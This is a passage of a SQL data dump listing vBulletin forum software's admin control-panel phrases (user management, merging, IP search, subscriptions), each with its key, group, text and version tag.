(33675, -1, 'user_rank_file_path', 'cprank', 'User Rank File Path', 'vbulletin', '', 0, ''),
(33676, -1, 'user_rank_manager', 'cprank', 'User Rank Manager', 'vbulletin', '', 0, ''),
(33677, -1, 'accept_all', 'cpuser', 'Accept All', 'vbulletin', '', 0, ''),
(33678, -1, 'add_new_answer', 'cpuser', 'Add New Answer', 'vbulletin', 'vBulletin Solutions', 1192567934, '3.7.0 Beta 1'),
(33679, -1, 'add_new_custom_avatar', 'cpuser', 'Add New Custom Avatar', 'vbulletin', '', 0, ''),
(33680, -1, 'add_new_question', 'cpuser', 'Add New Question', 'vbulletin', 'vBulletin Solutions', 1192568552, '3.7.0 Beta 1'),
(33681, -1, 'add_new_user_infraction_level', 'cpuser', 'Add New User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33682, -1, 'add_new_user_title', 'cpuser', 'Add New User Title', 'vbulletin', '', 0, ''),
(33683, -1, 'add_paid_subscription', 'cpuser', 'Add Paid Subscription', 'vbulletin', 'vBulletin Solutions', 1146076320, '3.6.0 Beta 1'),
(33684, -1, 'additional_users', 'cpuser', 'Additional Users', 'vbulletin', '', 0, ''),
(33685, -1, 'admin_override_options', 'cpuser', 'Admin Override Options', 'vbulletin', 'vBulletin Solutions', 1144591102, '3.6.0 Beta 1'),
(33686, -1, 'admin_set_html_allowed', 'cpuser', 'Yes, admin set (HTML allowed)', 'vbulletin', '', 0, ''),
(33687, -1, 'all_members_of_this_usergroup_will_revert', 'cpuser', 'All members of this usergroup will revert to the {1} group.', 'vbulletin', 'vBulletin Solutions', 1219837239, '3.8.0 Alpha 1'),
(33688, -1, 'all_posts_will_be_set_to_guest', 'cpuser', 'All posts made by this user will be set to \'Guest\'', 'vbulletin', '', 0, ''),
(33689, -1, 'all_time', 'cpuser', 'All Time', 'vbulletin', '', 0, ''),
(33690, -1, 'allow_access_to_forum', 'cpuser', 'Allow Access to Forum', 'vbulletin', '', 0, ''),
(33691, -1, 'answer', 'cpuser', 'Answer', 'vbulletin', 'vBulletin Solutions', 1192567959, '3.7.0 Beta 1'),
(33692, -1, 'answers', 'cpuser', 'Answers', 'vbulletin', 'vBulletin Solutions', 1192568654, '3.7.0 Beta 1'),
(33693, -1, 'are_you_sure_want_to_delete_private_messages_belonging_to_the_user_x', 'cpuser', 'Are you sure you want to delete the private messages belonging to the user called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33694, -1, 'are_you_sure_want_to_delete_private_messages_sent_by_the_user_x', 'cpuser', 'Are you sure you want to delete the private messages sent by the user called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33695, -1, 'are_you_sure_want_to_delete_subscriptions_x', 'cpuser', 'Are you sure you want to delete the subscriptions called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33696, -1, 'are_you_sure_want_to_delete_user_x', 'cpuser', 'Are you sure you want to delete the user called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33697, -1, 'are_you_sure_want_to_delete_visitor_messages_sent_by_the_user_x', 'cpuser', 'Are you sure you want to delete the visitor messages sent by the user called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1222174623, '3.8.0 Alpha 2'),
(33698, -1, 'are_you_sure_you_want_to_delete_this_answer', 'cpuser', 'Are you sure you want to delete this answer?', 'vbulletin', 'vBulletin Solutions', 1192563305, '3.7.0 Beta 1'),
(33699, -1, 'are_you_sure_you_want_to_delete_this_question', 'cpuser', 'Are you sure you want to delete this question?', 'vbulletin', 'vBulletin Solutions', 1192563340, '3.7.0 Beta 1'),
(33700, -1, 'are_you_sure_you_want_to_delete_this_user_title', 'cpuser', 'Are you sure you want to delete this User Title?', 'vbulletin', '', 0, ''),
(33701, -1, 'are_you_sure_you_want_to_merge_x_into_y', 'cpuser', 'Are you sure you want to merge {1} into {2} ? \r\n \r\n{1} will be deleted after the merge.', 'vbulletin', '', 0, ''),
(33702, -1, 'auto_subscription_mode', 'cpuser', 'Automatic Thread Subscription Mode', 'vbulletin', '', 0, ''),
(33703, -1, 'avatars_to_show_per_page', 'cpuser', 'Avatars to Show Per Page', 'vbulletin', '', 0, ''),
(33704, -1, 'ban_user', 'cpuser', 'Ban User', 'vbulletin', '', 0, ''),
(33705, -1, 'birthday_is_after', 'cpuser', 'Birthday is After', 'vbulletin', '', 0, ''),
(33706, -1, 'birthday_is_before', 'cpuser', 'Birthday is Before', 'vbulletin', '', 0, ''),
(33707, -1, 'browsing_options', 'cpuser', 'Browsing Options', 'vbulletin', '', 0, ''),
(33708, -1, 'change_avatar', 'cpuser', 'Change Avatar', 'vbulletin', '', 0, ''),
(33709, -1, 'change_profile_picture', 'cpuser', 'Change Profile Picture', 'vbulletin', '', 0, ''),
(33710, -1, 'change_signature', 'cpuser', 'Change Signature', 'vbulletin', '', 0, ''),
(33711, -1, 'change_signature_picture', 'cpuser', 'Change Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33712, -1, 'click_the_button_to_send_password_reminder_to_x', 'cpuser', 'Click the button below to send a password reminder to {1}', 'vbulletin', '', 0, ''),
(33713, -1, 'confirm_merge', 'cpuser', 'Confirm Merge', 'vbulletin', '', 0, ''),
(33714, -1, 'coppa_user', 'cpuser', 'COPPA User', 'vbulletin', '', 0, ''),
(33715, -1, 'could_not_resolve_hostname', 'cpuser', 'Could Not Resolve Hostname', 'vbulletin', '', 0, ''),
(33716, -1, 'current_reputation_power', 'cpuser', 'Current Reputation Power', 'vbulletin', '', 0, ''),
(33717, -1, 'delete_all', 'cpuser', 'Delete All', 'vbulletin', '', 0, ''),
(33718, -1, 'delete_all_users_private_messages', 'cpuser', 'Delete All User\'s Private Messages', 'vbulletin', '', 0, ''),
(33719, -1, 'delete_avatar', 'cpuser', 'Delete Avatar', 'vbulletin', '', 0, ''),
(33720, -1, 'delete_private_messages', 'cpuser', 'Delete Private Messages', 'vbulletin', '', 0, ''),
(33721, -1, 'delete_private_messages_sent_by_user', 'cpuser', 'Delete Private Messages Sent by User', 'vbulletin', '', 0, ''),
(33722, -1, 'delete_subscriptions', 'cpuser', 'Delete Subscriptions', 'vbulletin', '', 0, ''),
(33723, -1, 'delete_user', 'cpuser', 'Delete User', 'vbulletin', '', 0, ''),
(33724, -1, 'delete_user_transfer_social_groups', 'cpuser', 'This user is the maintainer of {1} social group(s) \r\nIf you delete this user, you will also delete their social groups as well as all discussions, messages, user memberships, social group images and all other content related to their social groups. \r\nIf you want to force the transfer of this user\'s social groups to yourself so that you may transfer or manage them later then check this checkbox: ', 'vbulletin', 'vBulletin Solutions', 1227018721, '3.8.0 Beta 3'),
(33725, -1, 'delete_visitor_messages_sent_by_user', 'cpuser', 'Delete Visitor Messages Sent by User', 'vbulletin', 'vBulletin Solutions', 1222174645, '3.8.0 Alpha 2'),
(33726, -1, 'deleting_bans', 'cpuser', 'Deleting Bans', 'vbulletin', '', 0, ''),
(33727, -1, 'deleting_custom_avatars', 'cpuser', 'Deleting Custom Avatars', 'vbulletin', '', 0, ''),
(33728, -1, 'deleting_custom_profilepics', 'cpuser', 'Deleting Custom Profile Pictures', 'vbulletin', '', 0, ''),
(33729, -1, 'deleting_event_reminders', 'cpuser', 'Deleting Event Reminders', 'vbulletin', '', 0, ''),
(33730, -1, 'deleting_events', 'cpuser', 'Deleting Events', 'vbulletin', '', 0, ''),
(33731, -1, 'deleting_moderators', 'cpuser', 'Deleting Moderators', 'vbulletin', '', 0, ''),
(33732, -1, 'deleting_private_messages', 'cpuser', 'Deleting Private Messages', 'vbulletin', '', 0, ''),
(33733, -1, 'deleting_subscriptions', 'cpuser', 'Deleting Subscriptions', 'vbulletin', '', 0, ''),
(33734, -1, 'deleting_user_forum_access', 'cpuser', 'Deleting User Forum Access', 'vbulletin', '', 0, ''),
(33735, -1, 'deleting_usergroup_join_requests', 'cpuser', 'Deleting Usergroup Join Requests', 'vbulletin', '', 0, ''),
(33736, -1, 'deleting_usernotes', 'cpuser', 'Deleting User Notes', 'vbulletin', '', 0, ''),
(33737, -1, 'deleting_users', 'cpuser', 'Deleting Users', 'vbulletin', '', 0, ''),
(33738, -1, 'depth_to_search', 'cpuser', 'Depth to Search', 'vbulletin', '', 0, ''),
(33739, -1, 'destination_username', 'cpuser', 'Destination Username', 'vbulletin', '', 0, ''),
(33740, -1, 'display_aim_screen_name', 'cpuser', 'Display AIM Screen Name', 'vbulletin', '', 0, ''),
(33741, -1, 'display_avatars', 'cpuser', 'Display Avatars', 'vbulletin', '', 0, ''),
(33742, -1, 'display_birthday', 'cpuser', 'Display Birthday', 'vbulletin', '', 0, ''),
(33743, -1, 'display_coppa_user', 'cpuser', 'Display COPPA User', 'vbulletin', '', 0, ''),
(33744, -1, 'display_email', 'cpuser', 'Display Email', 'vbulletin', '', 0, ''),
(33745, -1, 'display_group', 'cpuser', 'Display Group', 'vbulletin', 'vBulletin Solutions', 1153865337, '3.6.0 Release Candidate 3'),
(33746, -1, 'display_home_page', 'cpuser', 'Display Home Page', 'vbulletin', '', 0, ''),
(33747, -1, 'display_icq_uin', 'cpuser', 'Display ICQ UIN', 'vbulletin', '', 0, ''),
(33748, -1, 'display_images', 'cpuser', 'Display Images', 'vbulletin', '', 0, ''),
(33749, -1, 'display_infraction_points', 'cpuser', 'Display Infraction Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33750, -1, 'display_infractions', 'cpuser', 'Display Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33751, -1, 'display_ip_address', 'cpuser', 'Display IP Address', 'vbulletin', '', 0, ''),
(33752, -1, 'display_join_date', 'cpuser', 'Display Join Date', 'vbulletin', '', 0, ''),
(33753, -1, 'display_last_activity', 'cpuser', 'Display Last Activity', 'vbulletin', '', 0, ''),
(33754, -1, 'display_last_post', 'cpuser', 'Display Last Post', 'vbulletin', '', 0, ''),
(33755, -1, 'display_msn_id', 'cpuser', 'Display MSN ID', 'vbulletin', '', 0, ''),
(33756, -1, 'display_parent_email_address', 'cpuser', 'Display Parent Email Address', 'vbulletin', '', 0, ''),
(33757, -1, 'display_post_count', 'cpuser', 'Display Post Count', 'vbulletin', '', 0, ''),
(33758, -1, 'display_reputation', 'cpuser', 'Display Reputation', 'vbulletin', '', 0, ''),
(33759, -1, 'display_signature', 'cpuser', 'Display Signature', 'vbulletin', '', 0, ''),
(33760, -1, 'display_signatures', 'cpuser', 'Display Signatures', 'vbulletin', '', 0, ''),
(33761, -1, 'display_skype_name', 'cpuser', 'Display Skype Name', 'vbulletin', '', 0, ''),
(33762, -1, 'display_user_title', 'cpuser', 'Display User Title', 'vbulletin', '', 0, ''),
(33763, -1, 'display_usergroup', 'cpuser', 'Display Usergroup', 'vbulletin', '', 0, ''),
(33764, -1, 'display_username', 'cpuser', 'Display User Name', 'vbulletin', '', 0, ''),
(33765, -1, 'display_warnings', 'cpuser', 'Display Warnings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33766, -1, 'display_x', 'cpuser', 'Display {1}', 'vbulletin', '', 0, ''),
(33767, -1, 'display_yahoo_id', 'cpuser', 'Display Yahoo! ID', 'vbulletin', '', 0, ''),
(33768, -1, 'do_not_show_editor_toolbar', 'cpuser', 'Do Not Show Editor Toolbar', 'vbulletin', '', 0, ''),
(33769, -1, 'dst_currently_in_effect', 'cpuser', 'Is DST currently in effect', 'vbulletin', '', 0, ''),
(33770, -1, 'edit_access_masks', 'cpuser', 'Edit Access Masks', 'vbulletin', '', 0, ''),
(33771, -1, 'edit_administrator_permissions', 'cpuser', 'Edit Administrator Permissions', 'vbulletin', '', 0, ''),
(33772, -1, 'edit_forum_permissions_access_masks', 'cpuser', 'Edit Forum Permissions (Access Masks)', 'vbulletin', '', 0, ''),
(33773, -1, 'edit_profile_customizations', 'cpuser', 'Edit Profile Customizations', 'vbulletin', 'vBulletin Solutions', 1199377150, '3.7.0 Beta 4'),
(33774, -1, 'edit_profile_style_customizations_for_x', 'cpuser', 'Edit Profile Style Customizations for \'{1} \'', 'vbulletin', 'vBulletin Solutions', 1199377034, '3.7.0 Beta 4'),
(33775, -1, 'edit_reputation', 'cpuser', 'Edit Reputation', 'vbulletin', '', 0, ''),
(33776, -1, 'edit_reputation_comment', 'cpuser', 'Edit Reputation Comment', 'vbulletin', '', 0, ''),
(33777, -1, 'edit_user', 'cpuser', 'Edit User', 'vbulletin', '', 0, ''),
(33778, -1, 'email_manager', 'cpuser', 'Email Manager', 'vbulletin', '', 0, ''),
(33779, -1, 'email_options', 'cpuser', 'Email Options', 'vbulletin', '', 0, ''),
(33780, -1, 'email_password_reminder_to_user', 'cpuser', 'Email Password Reminder to User', 'vbulletin', '', 0, ''),
(33781, -1, 'email_to_send_at_once', 'cpuser', 'Email to send at once:', 'vbulletin', '', 0, ''),
(33782, -1, 'email_will_be_sent_in_user_specified_language', 'cpuser', 'Note: The email will be sent in the language selected by the user in their profile.', 'vbulletin', '', 0, ''),
(33783, -1, 'enter_image_url', 'cpuser', 'Please enter the URL of your image:', 'vbulletin', 'vBulletin Solutions', 1150468466, '3.6.0 Beta 3'),
(33784, -1, 'enter_signature_picture_url', 'cpuser', 'Enter Signature Picture URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33785, -1, 'expires', 'cpuser', 'Expires', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33786, -1, 'find_ip_addresses_for_user', 'cpuser', 'Find IP Addresses for userEnter Username ', 'vbulletin', '', 0, ''),
(33787, -1, 'find_more_users_with_this_ip_address', 'cpuser', 'Find More Users with this IP Address', 'vbulletin', '', 0, ''),
(33788, -1, 'find_users_by_ip_address', 'cpuser', 'Find Users by IP AddressYou may enter a partial IP Address ', 'vbulletin', '', 0, ''),
(33789, -1, 'forum_permissions', 'cpuser', 'Forum Permissions', 'vbulletin', '', 0, ''),
(33790, -1, 'has_not_logged_on_for_xx_days', 'cpuser', 'Has not logged on for x days', 'vbulletin', '', 0, ''),
(33791, -1, 'human_verification_manager', 'cpuser', 'Human Verification Manager', 'vbulletin', 'vBulletin Solutions', 1192567987, '3.7.0 Beta 1'),
(33792, -1, 'human_verification_options', 'cpuser', 'Human Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568009, '3.7.0 Beta 1'),
(33793, -1, 'icq_uin', 'cpuser', 'ICQ UIN', 'vbulletin', '', 0, ''),
(33794, -1, 'if_you_leave_a_field_blank_it_will_be_ignored', 'cpuser', 'If you leave a field blank it will be ignored', 'vbulletin', '', 0, ''),
(33795, -1, 'if_you_want_to_prune_user_posts_first', 'cpuser', 'If you want to prune all the user\'s messages first, please click here .', 'vbulletin', '', 0, ''),
(33796, -1, 'ignore_all', 'cpuser', 'Ignore All', 'vbulletin', '', 0, ''),
(33797, -1, 'image_options', 'cpuser', 'Image Options', 'vbulletin', '', 0, ''),
(33798, -1, 'image_verification_options', 'cpuser', 'Image Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568061, '3.7.0 Beta 1'),
(33799, -1, 'include_users_that_have_declined_email', 'cpuser', 'Include users that have declined admin emails?', 'vbulletin', '', 0, ''),
(33800, -1, 'infraction_groups', 'cpuser', 'Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33801, -1, 'infraction_points', 'cpuser', 'Infraction Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33802, -1, 'infraction_points_are_greater_than', 'cpuser', 'Infraction Points are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33803, -1, 'infraction_points_are_less_than', 'cpuser', 'Infraction Points are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33804, -1, 'infractions_are_greater_than', 'cpuser', 'Infractions are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33805, -1, 'infractions_are_less_than', 'cpuser', 'Infractions are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33806, -1, 'ip_address_search_for_ip_address_x', 'cpuser', 'IP Address Search for IP Address: \" {1}\"', 'vbulletin', '', 0, ''),
(33807, -1, 'ip_address_search_for_user_x', 'cpuser', 'IP Address Search for User: \" {1}\"', 'vbulletin', '', 0, ''),
(33808, -1, 'it_is_recommended_that_you_update_user_titles', 'cpuser', 'It is recommended that you update user titles and ranks after adding, editing, and deleting user titles or ranks.', 'vbulletin', '', 0, ''),
(33809, -1, 'join_date_is_after', 'cpuser', 'Join Date is After', 'vbulletin', '', 0, ''),
(33810, -1, 'join_date_is_before', 'cpuser', 'Join Date is Before', 'vbulletin', '', 0, ''),
(33811, -1, 'join_requests_manager', 'cpuser', 'Join Requests Manager', 'vbulletin', '', 0, ''),
(33812, -1, 'keep_adminavatar', 'cpuser', 'Keep Custom Avatar', 'vbulletin', 'vBulletin Solutions', 1144591065, '3.6.0 Beta 1'),
(33813, -1, 'keep_adminprofilepic', 'cpuser', 'Keep Custom Profile Pic', 'vbulletin', 'vBulletin Solutions', 1144591077, '3.6.0 Beta 1'),
(33814, -1, 'last_activity_is_after', 'cpuser', 'Last Activity is After', 'vbulletin', '', 0, ''),
(33815, -1, 'last_activity_is_before', 'cpuser', 'Last Activity is Before', 'vbulletin', '', 0, ''),
(33816, -1, 'last_post_is_after', 'cpuser', 'Last Post is After', 'vbulletin', '', 0, ''),
(33817, -1, 'last_post_is_before', 'cpuser', 'Last Post is Before', 'vbulletin', '', 0, ''),
(33818, -1, 'list_new_registrations', 'cpuser', 'List New Registrations', 'vbulletin', '', 0, ''),
(33819, -1, 'list_top_posters', 'cpuser', 'List Top Posters', 'vbulletin', '', 0, ''),
(33820, -1, 'list_users_awaiting_moderation', 'cpuser', 'List Users Awaiting Moderation', 'vbulletin', '', 0, ''),
(33821, -1, 'list_users_with_x_messages', 'cpuser', 'List Users with {1} Messages', 'vbulletin', '', 0, ''),
(33822, -1, 'list_visitors_in_the_last_24_hours', 'cpuser', 'List Visitors in the Last 24 Hours', 'vbulletin', '', 0, ''),
(33823, -1, 'maximum_results', 'cpuser', 'Max Results', 'vbulletin', '', 0, ''),
(33824, -1, 'merge_allows_you_to_join_two_user_accounts', 'cpuser', 'Merge allows you to join two user accounts into one single account.\r\nThe source account will be combined into the destination account. \r\n \r\nPosts, threads, calendar events, private messages, post count, reputation, contacts, friends and ignore list will be combined. \r\n \r\nThe combined user will still have the same permissions that the destination user had to begin with.\r\nAny access masks or moderator ability that the source user had will not be transferred. \r\n \r\nThis process cannot be reversed .', 'vbulletin', 'vBulletin Solutions', 1196771209, '3.7.0 Beta 1'),
(33825, -1, 'merge_users', 'cpuser', 'Merge Users', 'vbulletin', '', 0, ''),
(33826, -1, 'message_email', 'cpuser', 'Message:In the message, you may use $userid, $username, $email, $activateid, and $activatelink. $activateid will be the activation number the user must use to activate his/her account. $activatelink will be the URL that a user needs to visit to be activated. Note: These will only be defined to users in the \"Users Awaiting Email Confirmation\" group. Note: you cannot send passwords using this form as they are encrypted in the database. Please link to the \'lost password\' form instead. ', 'vbulletin', '', 0, ''),
(33827, -1, 'move_user_to_usergroup', 'cpuser', 'Move User to Usergroup', 'vbulletin', '', 0, ''),
(33828, -1, 'msn_id', 'cpuser', 'MSN ID', 'vbulletin', '', 0, ''),
(33829, -1, 'new_value', 'cpuser', 'New Value', 'vbulletin', 'vBulletin Solutions', 1190802674, '3.7.0 Beta 1'),
(33830, -1, 'no_matches_found', 'cpuser', 'No Matches Found', 'vbulletin', '', 0, ''),
(33831, -1, 'number_of_messages', 'cpuser', 'Number of Messages', 'vbulletin', '', 0, ''),
(33832, -1, 'number_of_users', 'cpuser', 'Number of Users', 'vbulletin', '', 0, ''),
(33833, -1, 'old_value', 'cpuser', 'Old Value', 'vbulletin', 'vBulletin Solutions', 1190802664, '3.7.0 Beta 1'),
(33834, -1, 'other_please_specify', 'cpuser', 'Other (please specify)', 'vbulletin', '', 0, ''),
(33835, -1, 'personal_home_page', 'cpuser', 'Home Page', 'vbulletin', '', 0, ''),
(33836, -1, 'please_input_referral_dates', 'cpuser', 'Please input the dates that you would like the report run for or leave them blank for a report covering everything.', 'vbulletin', '', 0, ''),
(33837, -1, 'points', 'cpuser', 'Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33838, -1, 'pop_up_notification_box_when_a_private_message_is_received', 'cpuser', 'Pop up a Notification Box When a Private Message is Received', 'vbulletin', '', 0, ''),
(33839, -1, 'post_ip_addresses', 'cpuser', 'Post IP Addresses', 'vbulletin', '', 0, ''),
(33840, -1, 'posts_are_greater_than', 'cpuser', 'Posts are greater than or equal to', 'vbulletin', '', 0, ''),
(33841, -1, 'posts_are_less_than', 'cpuser', 'Posts are less than', 'vbulletin', '', 0, ''),
(33842, -1, 'posts_is_less_than', 'cpuser', 'Posts is less than', 'vbulletin', '', 0, ''),
(33843, -1, 'primary_users', 'cpuser', 'Primary Users', 'vbulletin', '', 0, ''),
(33844, -1, 'private_message_statistics', 'cpuser', 'Private Message Statistics', 'vbulletin', '', 0, ''),
(33845, -1, 'private_messages_belonging_to_the_user', 'cpuser', 'Private Messages belonging to the user', 'vbulletin', '', 0, ''),
(33846, -1, 'private_messages_for_x', 'cpuser', 'Private Messages for {1}', 'vbulletin', '', 0, ''),
(33847, -1, 'private_messages_sent_by_the_user', 'cpuser', 'Private Messages sent by the user', 'vbulletin', '', 0, ''),
(33848, -1, 'process', 'cpuser', 'Process', 'vbulletin', '', 0, ''),
(33849, -1, 'profile_style_customizations', 'cpuser', 'Profile Style Customizations', 'vbulletin', 'vBulletin Solutions', 1199377123, '3.7.0 Beta 4'),
(33850, -1, 'question_dfn', 'cpuser', 'QuestionAnswers are added after the question is created. ', 'vbulletin', 'vBulletin Solutions', 1192568807, '3.7.0 Beta 1'),
(33851, -1, 'question_verification_options', 'cpuser', 'Question & Answer Verification Options', 'vbulletin', 'vBulletin Solutions', 1192568615, '3.7.0 Beta 1'),
(33852, -1, 'quick_user_links', 'cpuser', 'Quick User Links', 'vbulletin', '', 0, ''),
(33853, -1, 'receieve_friend_request_notification', 'cpuser', 'Receive Friend Request Notification', 'vbulletin', 'vBulletin Solutions', 1195308646, '3.7.0 Beta 1'),
(33854, -1, 'referrals_for_x', 'cpuser', 'Referrals for {1}', 'vbulletin', '', 0, ''),
(33855, -1, 'regex', 'cpuser', 'Regex', 'vbulletin', 'vBulletin Solutions', 1192568890, '3.7.0 Beta 1'),
(33856, -1, 'registration_ip_address', 'cpuser', 'Registration IP Address', 'vbulletin', '', 0, ''),
(33857, -1, 'registration_ip_addresses', 'cpuser', 'Registration IP Addresses', 'vbulletin', '', 0, ''),
(33858, -1, 'regular_expression_require_match', 'cpuser', 'Regular ExpressionYou may require the input field to match a regular expression (PCRE ). ', 'vbulletin', 'vBulletin Solutions', 1192568760, '3.7.0 Beta 1'),
(33859, -1, 'reputation_for_a_page_b_c_there_are_d_comments', 'cpuser', 'Reputation for {1} (Page {2}/{3}) | There are {4} comments.', 'vbulletin', '', 0, ''),
(33860, -1, 'reputation_is_greater_than', 'cpuser', 'Reputation is greater than or equal to', 'vbulletin', '', 0, ''),
(33861, -1, 'reputation_is_less_than', 'cpuser', 'Reputation is less than', 'vbulletin', '', 0, ''),
(33862, -1, 'resize_image_to_users_maximum_allowed_size', 'cpuser', 'Resize image to user\'s maximum allowed dimensions\r\nAs defined by their usergroup(s) ', 'vbulletin', 'vBulletin Solutions', 1233582417, '3.8.2'),
(33863, -1, 'resolve_address', 'cpuser', 'Resolve Address', 'vbulletin', '', 0, ''),
(33864, -1, 'search_criteria', 'cpuser', 'Search Criteria', 'vbulletin', '', 0, ''),
(33865, -1, 'search_ip_addresses', 'cpuser', 'Search IP Addresses', 'vbulletin', '', 0, ''),
(33866, -1, 'search_users', 'cpuser', 'Search Users', 'vbulletin', '', 0, ''),
(33867, -1, 'send_email_to_accepted_users', 'cpuser', 'Send email to users who have been accepted', 'vbulletin', '', 0, ''),
(33868, -1, 'send_email_to_deleted_users', 'cpuser', 'Send email to users who have been deleted', 'vbulletin', '', 0, ''),
(33869, -1, 'send_email_to_user', 'cpuser', 'Send Email to User', 'vbulletin', '', 0, ''),
(33870, -1, 'send_password_to_user', 'cpuser', 'Send Password to User', 'vbulletin', '', 0, ''),
(33871, -1, 'send_private_message_to_user', 'cpuser', 'Send Private Message to User', 'vbulletin', '', 0, ''),
(33872, -1, 'show_all_coppa_users', 'cpuser', 'Show All COPPA Users', 'vbulletin', '', 0, ''),
(33873, -1, 'show_all_users', 'cpuser', 'Show All Users', 'vbulletin', '', 0, ''),
(33874, -1, 'show_others_custom_profile_styles', 'cpuser', 'Show Other Users\' Custom Profile Styles', 'vbulletin', 'vBulletin Solutions', 1195659127, '3.7.0 Beta 1'),
(33875, -1, 'showing_avatars_x_to_y_of_z', 'cpuser', 'Showing Avatars {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925346, '3.7.0 Release Candidate 1'),
(33876, -1, 'showing_users_x_to_y_of_z', 'cpuser', 'Showing Users {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925375, '3.7.0 Release Candidate 1'),
(33877, -1, 'sorting_options', 'cpuser', 'Sorting Options', 'vbulletin', '', 0, ''),
(33878, -1, 'source_username', 'cpuser', 'Source Username', 'vbulletin', '', 0, ''),
(33879, -1, 'starting_at_result', 'cpuser', 'Starting at Result', 'vbulletin', '', 0, ''),
(33880, -1, 'subscribe_choice_0', 'cpuser', 'Subscribe with no notification', 'vbulletin', '', 0, ''),
(33881, -1, 'subscribe_choice_1', 'cpuser', 'Instant email notification', 'vbulletin', '', 0, ''),
(33882, -1, 'subscribe_choice_2', 'cpuser', 'Daily email notification', 'vbulletin', '', 0, ''),
(33883, -1, 'subscribe_choice_3', 'cpuser', 'Weekly email notification', 'vbulletin', '', 0, ''),
(33884, -1, 'subscribe_choice_none', 'cpuser', 'Do not subscribe', 'vbulletin', '', 0, ''),
(33885, -1, 'test', 'cpuser', 'Test', 'vbulletin', '', 0, ''),
(33886, -1, 'test_email_only', 'cpuser', 'Test Email Only?(Will not send any email out) ', 'vbulletin', '', 0, ''),
(33887, -1, 'text_to_separate_addresses_by', 'cpuser', 'Text to separate addresses by:This is a space by default, but you may wish to produce, CSV (in this case use a comma) or quoted CSV (use: \",\" in this case, including the quotes), so both of these are possible. ', 'vbulletin', '', 0, ''),
(33888, -1, 'this_action_is_not_reversible', 'cpuser', 'Note: Clicking the \'delete\' button will remove the selected users completely. This action is not reversible... please be sure! Users marked with the [ ! ] button are not editable using this system.', 'vbulletin', '', 0, ''),
(33889, -1, 'this_is_a_coppa_user_do_not_change_to_registered', 'cpuser', 'This is a COPPA user. Do not change usergroup to \'Registered\' unless you have received parental consent', 'vbulletin', '', 0, ''),
(33890, -1, 'this_system_allows_you_to_mass_move_delete_users', 'cpuser', 'This system allows you to mass-move users to a different usergroup, or prune away inactive members. Use the form below to select users matching your search conditions. You will then be given the option to individually move or prune away the matched users.', 'vbulletin', '', 0, ''),
(33891, -1, 'time_options', 'cpuser', 'Time Options', 'vbulletin', '', 0, ''),
(33892, -1, 'update_or_add_administration_permissions', 'cpuser', 'Update or Add Administration Permissions', 'vbulletin', '', 0, ''),
(33893, -1, 'updating_threads_posts', 'cpuser', 'Updating Threads / Posts', 'vbulletin', '', 0, ''),
(33894, -1, 'updating_threads_posts_for_x', 'cpuser', 'Updating Threads / Posts for {1}', 'vbulletin', '', 0, ''),
(33895, -1, 'updating_users', 'cpuser', 'Updating Users', 'vbulletin', '', 0, ''),
(33896, -1, 'use_current_avatar', 'cpuser', 'Use Current Avatar', 'vbulletin', '', 0, ''),
(33897, -1, 'use_email_notification_by_default', 'cpuser', 'Use Email Notification by Default', 'vbulletin', '', 0, ''),
(33898, -1, 'use_signature_picture', 'cpuser', 'Use Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33899, -1, 'user_has_no_avatar', 'cpuser', 'User has no avatar', 'vbulletin', '', 0, ''),
(33900, -1, 'user_manager', 'cpuser', 'User Manager', 'vbulletin', '', 0, ''),
(33901, -1, 'user_moving_pruning_system', 'cpuser', 'User Moving/Pruning System', 'vbulletin', '', 0, ''),
(33902, -1, 'user_no_permission_customize_profile', 'cpuser', 'This user does not have permission to customize any parts of his or her profile.', 'vbulletin', 'vBulletin Solutions', 1199377378, '3.7.0 Beta 4'),
(33903, -1, 'user_profile_field_options', 'cpuser', 'User Profile Field Options', 'vbulletin', '', 0, ''),
(33904, -1, 'user_ranks_desc', 'cpuser', 'User ranks are images that appear beneath your user\'s names on their posts. Ranks assigned to All Usergroups appear for everyone.', 'vbulletin', '', 0, ''),
(33905, -1, 'user_set', 'cpuser', 'Yes, user set', 'vbulletin', '', 0, ''),
(33906, -1, 'user_title_manager', 'cpuser', 'User Title Manager', 'vbulletin', '', 0, ''),
(33907, -1, 'usergroup_leader', 'cpuser', 'Usergroup Leader', 'vbulletin', '', 0, ''),
(33908, -1, 'usergroup_options', 'cpuser', 'Usergroup Options', 'vbulletin', '', 0, ''),
